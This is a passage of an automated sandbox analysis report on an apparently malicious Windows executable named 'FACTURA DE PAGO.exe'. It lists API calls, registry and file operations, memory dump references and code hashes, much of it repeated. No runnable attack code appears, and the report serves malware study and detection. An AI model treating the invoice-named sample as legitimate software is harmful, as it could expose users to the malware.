                                                                                          • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                          • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 3521207402-0
                                                                                        • Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                        • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                        • Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                        • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                        APIs
                                                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3677997916-0
                                                                                        • Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                        • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                        • Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                        • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                        • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                        • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                        • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                        APIs
                                                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 849931509-0
                                                                                        • Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                        • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                        • Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                        • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                          • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                          • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                          • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                        • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                        • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                        • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                        • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                        • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                        • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                        • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                        • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                        • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                        • GetLastError.KERNEL32 ref: 0040549F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                        • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                        • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                        • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID:
                                                                                        • API String ID: 71445658-0
                                                                                        • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                        • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                        • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                        • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                        • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                        • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                        • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                        • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                        • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                        • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                        • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                        • Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                        • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                        APIs
                                                                                        • SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 00403F72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
